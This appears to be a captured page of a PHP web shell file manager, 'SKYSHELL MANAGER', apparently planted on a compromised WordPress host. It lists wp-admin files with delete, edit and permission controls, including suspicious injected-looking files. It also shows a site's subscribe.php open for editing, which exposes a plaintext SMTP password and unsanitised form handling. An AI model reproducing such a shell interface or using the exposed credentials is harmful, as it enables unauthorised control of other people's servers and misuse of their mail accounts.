📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-functions.php
0.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tools.php
3.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: subscribe.php
<!DOCTYPE html> <html lang="en"> <head> <!-- basic --> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <!-- mobile metas --> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="viewport" content="initial-scale=1, maximum-scale=1"> <!-- site metas --> <title>Royal Gadget House</title> <meta name="keywords" content=""> <meta name="description" content=""> <meta name="author" content=""> <!-- bootstrap css --> <link rel="stylesheet" href="css/bootstrap.min.css"> <!-- style css --> <link rel="stylesheet" href="css/style.css"> <!-- Responsive--> <link rel="stylesheet" href="css/responsive.css"> <!-- fevicon --> <link rel="icon" href="images/fav.png" type="images/png" /> <!-- Scrollbar Custom CSS --> <link rel="stylesheet" href="css/jquery.mCustomScrollbar.min.css"> <!-- Tweaks for older IEs--> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script><![endif]--> <script src="https://www.google.com/recaptcha/api.js" async defer></script> <script type="text/javascript"> var onloadCallback = function() { grecaptcha.render('html_element', { 'sitekey' : '6LdIGjcaAAAAAAK66KIkYg0gSMRK3jh0UdG-V5Zh' }); }; </script> </head> <!-- body --> <body class="main-layout"> <!-- header --> <header> <!-- header inner --> <div class="container-fluid"> <div class="row"> <div class="col-lg-3 logo_section"> <div class="full"> <div class="center-desk"> <div class="logo"> <a href="index.php"><img src="images/logo.png" alt="Royal Gadget House"></a> </div> </div> </div> </div> <div class="col-lg-9"> <div class="menu-area"> <div class="limit-box"> <nav class="main-menu"> <ul class="menu-area-main"> <li> <a href="index.php">HOME</a> </li> <li> <a href="blog1.php">TRENDING</a> </li> <li> <a href="blog3.php">COOL GADGETS</a> </li> <li> <a href="blog2.php">TECHNOLOGY</a> </li> <li> <a href="contact.php">CONTACT US</a> </li> <li class="active"> <a href="subscribe.php">QUICK UPDATES</a> </li> </ul> </nav> </div> </div> </div> </div> </div> <!-- end header inner --> </header> <!-- end header --> <div class="contact-bg"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="contactheading"> <h3>Subscribe Us</h3> </div> </div> </div> </div> </div> <!-- section --> <section class="layout_padding"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="full comment_form"> <form action="subscribe.php" method="post"> <fieldset> <div class="col-md-12"> <div class="row"> <div class="col-md-6"> <input type="text" name="name" placeholder="Name" required="#" /> <input type="email" name="email" placeholder="Email" required="#" /> <div class="g-recaptcha" data-sitekey="6LdIGjcaAAAAAAK66KIkYg0gSMRK3jh0UdG-V5Zh"></div><br><br> <button type="submit" name="Submit" class="reply_bt">Subscribe Us</button> </div> <div class="col-md-6"> <img src="images/sub.jpg"> </div> </div> </div> </fieldset> </form> <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer> </script> <?php //subscribe form if (isset($_POST['Submit'])){ $email=$_REQUEST['email']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/royalgadgethouse/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@royalgadgethouse.in'; $mail->Password = '5pU-3_8$9$}%<ke['; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@royalgadgethouse.in', 'Royal Gadget House'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@royalgadgethouse.in", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Royal Gadget House [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the Royal Gadget House newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a subscribe form on (http://royalgadgethouse.in)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Thanks for subscribing check sometimes later."; } else { echo "Thanks for subscribing to our service."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@royalgadgethouse.in'; $mail2->Password = '5pU-3_8$9$}%<ke['; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@royalgadgethouse.in', 'Royal Gadget House'); $mail2->addAddress('contact@royalgadgethouse.in', 'Royal Gadget House'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted subscribe details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> </div> </div> </div> </section> <!-- end section --> <!-- footer --> <footer> <div class="container"> <div class="row"> <div class="col-lg-8 col-md-6"> <h3 style="color:#ffff;font-weight: 500;font-size: 24px;">What We Do</h3> <p style="color:#ffff;"> Our royalgadgethouse.in is designed to help users make confident decisions online, this website contains information about a wide range of products and services. Certain details, including but not limited to prices and special offers, are provided to us directly from our partners and are dynamic and subject to change at any time without prior notice. Though based on extensive research, the information we share does not constitute legal or professional advice or forecast, and should not be treated as such. Reproduction of this website is strictly prohibited.</p><br> <p><a style="color:#ffff;font-size:10px;" href="privacy.php">Privacy Policy</a> | <a style="color:#ffff;font-size:10px;" href="terms.php">Terms Of Service</a> | <a style="color:#ffff;font-size:10px;" href="contact.php">Contact Us</a> | <a style="color:#ffff;font-size:10px;" href="subscribe.php">Subscribe</a> | <a style="color:#ffff;font-size:10px;" href="unsubscribe.php">Unsubscribe</a></p> </div> <div class="col-lg-4 col-md-6"> <div class="footer_links"> <h3>Our Newsletter</h3> <p style="color:#ffff;">Subscribe to get latest gadgets deals.</p><br> <form action="subscribe.php" method="post"> <fieldset> <div class="field"> <input type="text" name="name" placeholder="Your Name" required="" /> </div> <div class="field"> <input type="email" name="email" placeholder="Email" required="" /> </div> <div class="field"> <div class="g-recaptcha" data-sitekey="6LdIGjcaAAAAAAK66KIkYg0gSMRK3jh0UdG-V5Zh"></div> </div> <div class="field"> <div class="center"> <button type="submit" name="Submit" class="reply_bt">Subscribe Us</button> </div> </div> </fieldset> </form> <script src="https://www.google.com/recaptcha/api.js?onload=onloadCallback&render=explicit" async defer> </script> <?php //subscribe form if (isset($_POST['Submit'])){ $email=$_REQUEST['email']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ include_once('/var/www/html/wxwpsite/royalgadgethouse/PHPMailer/PHPMailerAutoload.php'); //PHPMailer Object $mail = new PHPMailer; //$mail->SMTPDebug = 3; $mail->Host = 'smtp.yandex.com'; // SMTP server $mail->Port = 465; // optional // used only when SMTP requires authentication $mail->SMTPAuth = true; $mail->Username = 'contact@royalgadgethouse.in'; $mail->Password = '5pU-3_8$9$}%<ke['; $mail->SMTPSecure = 'ssl'; $mail->IsSMTP(); //From email address and name //$mail->From = "vinothkumar@webberax.com"; //$mail->FromName = "vinoth"; $mail->setFrom('contact@royalgadgethouse.in', 'Royal Gadget House'); //To address and name $mail->addAddress($email, $name, $message); //$mail->addAddress('vinothkumar@webberax.com', 'hello'); //$mail->addAddress("recepient1@example.com"); //Recipient name is optional //Address to which recipient will reply $mail->addReplyTo("contact@royalgadgethouse.in", "Reply"); //CC and BCC //$mail->addCC("vinothkumar@gmail.com"); //$mail->addBCC("bcc@example.com"); //Send HTML or Plain Text email $mail->isHTML(true); $mail->Subject = "Royal Gadget House [Success!]"; $mail->Body = "<p>This message confirms that you have subscribed from the Royal Gadget House newsletter.</p></br> <p>Thank you!</p></br> <i>This e-mail was sent from a subscribe form on (http://royalgadgethouse.in)</i>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Thanks for subscribing check sometimes later."; } else { echo "Thanks for subscribing to our service."; } //PHPMailer Object $mail2 = new PHPMailer; //$mail->SMTPDebug = 3; $mail2->Host = 'smtp.yandex.com'; // SMTP server $mail2->Port = 465; // optional // used only when SMTP requires authentication $mail2->SMTPAuth = true; $mail2->Username = 'contact@royalgadgethouse.in'; $mail2->Password = '5pU-3_8$9$}%<ke['; $mail2->SMTPSecure = 'ssl'; $mail2->IsSMTP(); $mail2->setFrom('contact@royalgadgethouse.in', 'Royal Gadget House'); $mail2->addAddress('contact@royalgadgethouse.in', 'Royal Gadget House'); $mail2->isHTML(true); $mail2->Subject = "Contact Details"; $mail2->Body = "<strong>Following user has been submitted subscribe details on your website <strong><br> Name : $name<br> Email : $email<br> Message: $message<br>"; $mail2->send(); } } ?> </div> </div> </div> </div> </footer> <div class="cpy"> <div class="container"> <div class="row"> <div class="col-md-12"> <p style="font-size:12px;">Copyright © 2025 Royalgadgethouse.in</p> </div> </div> </div> </div> <!-- end footer --> <!-- Javascript files--> <script src="js/jquery.min.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.bundle.min.js"></script> <script src="js/jquery-3.0.0.min.js"></script> <script src="js/plugin.js"></script> <!-- Scrollbar Js Files --> <script src="js/jquery.mCustomScrollbar.concat.min.js"></script> <script src="js/custom.js"></script> </body> </html>
Save